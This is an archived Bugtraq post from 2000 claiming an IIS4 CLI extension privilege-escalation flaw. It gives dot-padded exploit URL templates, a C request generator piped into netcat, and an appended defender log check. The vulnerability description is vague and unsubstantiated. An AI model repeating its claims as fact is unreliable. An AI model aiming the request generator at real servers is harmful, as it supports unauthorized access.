Bugtraq mailing list archives

Shinex vs. IIS CLI Extensions


From: dev-null () NO-ID COM (dev-null () NO-ID COM)
Date: Mon, 5 Jun 2000 12:31:38 -0000


[ This message has been sent anonymously due to configuration problems
I'm experiencing with my mail server. If you would like to discuss
the fine points of this post, you're quite welcome to message me on
Efnet (nickname: shinex). ]

While doing a security audit on a WinNT 4.0 system, I discovered an 
`object collision` vulnerability that can potentially lead to remote 
compromise.

The flaw lies in the mechanism employed by CLI objects to handle
dynamic pre-auth requests from a stateful client. States of operation
are inherent in the implementation itself. This flaw could lead to a
determined attacker gaining administrative privileges on servers 
using this widely deployed object kit.  

EXPLOITATION NOTES
------------------

Request #1:
http://www.victim.com/.....~518 chars.../[invocation of CLI object]

Request #2:
http://www.victim.com/.....~260 chars.../[request with req1 object as ext]

Simple as that.

It's important that both requests reach the target server within
a timeframe of 15 seconds (a rough estimate). Your threshold may vary.
Subsequent requests will be made with raised authorization levels.
The rationale for the char padding will be available later in the
followup post (see below).

Microsoft has been notified and patching information should be forthcoming. 
While not as severe as the RDS vulnerability, it is still an avenue of attack 
that could provide a determined attacker with unauthorized access.

(Allow me to mention in passing that the scarcity of detail in this paper
is intentional. A more thorough assessment will be posted after Microsoft
have released their hotfix.)

HELPER CODE
-----------
/*
** clisweep.c by shinex (efnet)
** Quick generator for IIS4 CLI extension vuln URLs.
**
** $ (./clisweep <cli object> ; cat) | nc www.victim.com 80
** OK. This code is buggy, because I mistakenly thought
** that both requests would be delivered without having
** to restart netcat. I can't code network apps. Sorry.
**
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define DOT1 518
#define DOT2 260
#define THRESHOLD 15
#define RANDFILE "AABBCC"

char *gendots(int);
char *calc(char *);

int main(int argc, char *argv[])
{
    char req1[1024], req2[1024];

    if(argc != 2)
    {
        fprintf(stderr, "Usage: %s <cli object>\n", *argv);
        return -1;
    }

    /* req1 must be built before calc() truncates argv[1] in place */
    snprintf(req1, sizeof(req1), "GET /%s/%s", gendots(DOT1), argv[1]);
    snprintf(req2, sizeof(req2), "GET /%s/%s", gendots(DOT2), calc(argv[1]));

    /* Nothing is printed unless compiled with -DSCRIPTKIDPROTECTION */
#ifdef SCRIPTKIDPROTECTION
    printf("%s\n\n", req1);
    sleep(THRESHOLD);
    printf("%s\n\n", req2);
#endif
    return 0;
}

/* Returns a static buffer holding num dots. The original never
   terminated the string, so the second (shorter) call still returned
   the 518 dots left over from the first call. */
char *gendots(int num)
{
    int i;
    static char dots[1024];
    char *ptr = dots;

    if(num > (int)sizeof(dots) - 1)
        num = (int)sizeof(dots) - 1;

    for(i = 0; i < num; i++)
        *ptr++ = '.';
    *ptr = '\0';

    return dots;
}

/* Builds RANDFILE with the object name (minus its extension) as the
   new extension, e.g. "foo.cli" -> "AABBCC.foo". Modifies arg in place. */
char *calc(char *arg)
{
    static char file[1024];
    char *ptr;

    ptr = strrchr(arg, '.');
    if(ptr != NULL)
        *ptr = '\0'; /* drop the original extension if there is one */
    snprintf(file, sizeof(file), "%s.%s", RANDFILE, arg);
    return file;
}

SHOUTOUTS
---------
Greets to route and my other friends.


--
This message has been sent via an anonymous mail relay at www.no-id.com.
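A defender-side log check for the request pattern the post describes, added here as an example and not part of the original message: it parses constructed IIS-style log lines (assumed simplified format: date, time, client IP, method, URI stem), flags request paths padded with a long run of dots, and reports clients that sent two such requests within the 15-second window the post cites. The MIN_RUN threshold and the log format are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines (not from any real server): date time c-ip cs-method cs-uri-stem
SAMPLE_LOG = """\
2000-06-05 12:31:00 10.0.0.7 GET /default.htm
2000-06-05 12:31:05 10.0.0.9 GET /{d518}/object.cli
2000-06-05 12:31:12 10.0.0.9 GET /{d260}/AABBCC.object
2000-06-05 12:31:40 10.0.0.9 GET /index.htm
2000-06-05 12:32:10 10.0.0.12 GET /{d518}/x.cli
2000-06-05 12:33:00 10.0.0.12 GET /{d260}/AABBCC.x
""".format(d518="." * 518, d260="." * 260)

MIN_RUN = 200                    # dot run that counts as padding (assumed threshold)
WINDOW = timedelta(seconds=15)   # pairing window the post cites
DOT_RUN = re.compile(r"\.{%d,}" % MIN_RUN)


def parse_line(line):
    """Split one simplified W3C-style log line into (timestamp, ip, method, uri)."""
    date, time, ip, method, uri = line.split(maxsplit=4)
    return datetime.fromisoformat(date + " " + time), ip, method, uri


def padded_requests(log_text):
    """Return (timestamp, ip, uri) for each request whose path carries a long dot run."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, method, uri = parse_line(line)
        if DOT_RUN.search(uri):
            hits.append((ts, ip, uri))
    return hits


def paired_within_window(log_text, window=WINDOW):
    """Return client IPs that sent two padded requests within `window` of each other."""
    by_ip = {}
    for ts, ip, _uri in padded_requests(log_text):
        by_ip.setdefault(ip, []).append(ts)
    flagged = []
    for ip, stamps in sorted(by_ip.items()):
        stamps.sort()
        # consecutive timestamps closer than the window match the post's two-request pattern
        if any(b - a <= window for a, b in zip(stamps, stamps[1:])):
            flagged.append(ip)
    return flagged
```

Only 10.0.0.9 is reported: 10.0.0.12 also sent both padded requests, but 50 seconds apart.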
